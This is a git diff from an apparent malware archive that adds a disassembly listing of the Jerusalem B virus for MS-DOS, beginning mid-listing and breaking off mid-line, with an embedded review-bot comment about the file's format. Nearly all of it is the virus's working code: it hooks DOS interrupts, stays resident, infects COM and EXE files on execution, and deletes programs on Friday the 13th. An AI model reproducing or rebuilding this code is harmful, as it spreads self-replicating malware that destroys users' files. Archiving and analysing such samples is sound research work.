B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 
MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR 
[Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV 
AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 FFFF ??? DI +0000:0636 FFFF ??? DI +0000:0638 FFFF ??? DI +0000:063A FFFF ??? DI +0000:063C 7C1F JL X065D +0000:063E DE3E8D29 ESC 037H,[Y0298DH] +0000:0642 1400 ADC AL,00H +0000:0644 1800 SBB [BX+SI],AL +0000:0646 F1 DB 0F1H +0000:0647 1F POP DS +0000:0648 FFFF ??? DI +0000:064A FFFF ??? 
DI +0000:064C 0000 ADD [BX+SI],AL +0000:064E 0000 ADD [BX+SI],AL +0000:0650 0000 ADD [BX+SI],AL +0000:0652 0000 ADD [BX+SI],AL +0000:0654 0000 ADD [BX+SI],AL +0000:0656 0000 ADD [BX+SI],AL +0000:0658 0000 ADD [BX+SI],AL +0000:065A 0000 ADD [BX+SI],AL +0000:065C 0000 ADD [BX+SI],AL +0000:065E 0000 ADD [BX+SI],AL +0000:0660 CD21 INT 021H +0000:0662 CB RET ; INTERSEGMENT +0000:0663 0000 X0663: ADD [BX+SI],AL +0000:0665 0000 ADD [BX+SI],AL +0000:0667 0000 ADD [BX+SI],AL +0000:0669 0000 ADD [BX+SI],AL +0000:066B 0000 ADD [BX+SI],AL +0000:066D 2020 AND [BX+SI],AH +0000:066F 2020 AND [BX+SI],AH +0000:0671 2020 AND [BX+SI],AH +0000:0673 2020 AND [BX+SI],AH +0000:0675 2020 AND [BX+SI],AH +0000:0677 2000 AND [BX+SI],AL +0000:0679 0000 ADD [BX+SI],AL +0000:067B 0000 ADD [BX+SI],AL +0000:067D 2020 AND [BX+SI],AH + +"JV.MOC" PAGE 0013 + +0000:067F 2020 AND [BX+SI],AH +0000:0681 2020 AND [BX+SI],AH +0000:0683 2020 AND [BX+SI],AH +0000:0685 2020 AND [BX+SI],AH +0000:0687 2000 AND [BX+SI],AL +0000:0689 0000 ADD [BX+SI],AL +0000:068B 0000 ADD [BX+SI],AL +0000:068D 0000 ADD [BX+SI],AL +0000:068F 0000 ADD [BX+SI],AL +0000:0691 0D6B6F OR AX,06F6BH +0000:0694 6465 JZ X06FB +0000:0696 6572 JNZ X070A +0000:0698 7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL 
+0000:06CF 0000 ADD [BX+SI],AL
+0000:06D1 0000 ADD [BX+SI],AL
+0000:06D3 0000 ADD [BX+SI],AL
+0000:06D5 0000 ADD [BX+SI],AL
+0000:06D7 0000 ADD [BX+SI],AL
+0000:06D9 005718 ADD [BX+018H],DL
+0000:06DC 0825 OR [DI],AH
+0000:06DE A5 MOVSW
+0000:06DF FEC5 INC CH
+0000:06E1 07 POP ES
+0000:06E2 1E PUSH DS
+0000:06E3 0210 ADD DL,[BX+SI]
+0000:06E5 07 POP ES
+0000:06E6 57 PUSH DI
+0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
+0000:06EB 0104 ADD [SI],AX
+0000:06ED 7F70 JG X075F
+
+"JV.MOC" PAGE 0014
+
+0000:06EF 0010 ADD [BX+SI],DL
+0000:06F1 07 POP ES
+0000:06F2 1D001C SBB AX,01C00H
+0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
+0000:06F9 0C1B OR AL,01BH
+0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
+0000:06FF F24D REPNE DEC BP
+0000:0701 360E PUSH CS
+0000:0703 0300 ADD AX,[BX+SI]
+0000:0705 0000 ADD [BX+SI],AL
+0000:0707 00EE ADD DH,CH
+0000:0709 002A X0709: ADD [BP+SI],CH
+0000:070B 0F POP CS
+0000:070C 42 INC DX
+0000:070D 01C1 ADD CX,AX
+0000:070F 0DB44C OR AX,04CB4H
+0000:0712 B000 MOV AL,00H
+0000:0714 CD21 X0714: INT 021H
+0000:0716 4D DEC BP
+0000:0717 7344 JAE X075D
+0000:0719 6F73 JG X078E
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru.lst b/MSDOS/Virus.MSDOS.Unknown.jeru.lst
new file mode 100644
index 00000000..556a184d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jeru.lst
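Review bot: Virus.MSDOS.Unknown.jeru.asm is a disassembler listing (address, opcode-byte and mnemonic columns with `"JV.MOC" PAGE` headers), not assemblable source, and the file section that follows shows Virus.MSDOS.Unknown.jeru.lst is a byte-identical copy (both sections carry blob id 556a184d), so the .asm extension is misleading and the content is duplicated; keeping only the .lst, or giving the .asm a first-line comment such as `; disassembler listing of the sample, not buildable source`, would make this explicit. The listing's only documentation is the line `This is the Jerusalem B Virus.`; from label X05F5 onward the tool appears to have decoded data bytes as instructions (long runs of `ADD [BX+SI],AL`, `??? DI`, and one line it marks `; NOT VALID`), so a note at X05F5 saying that the remainder is data rendered as code would keep a reader from analysing that region as instructions. The identification is not reproducible from the listing alone; recording the hash of the binary that was disassembled alongside it would let archivists and detection engineers confirm which sample it corresponds to.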
@@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP 
[BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV 
CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV 
AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H 
+0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H 
+0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 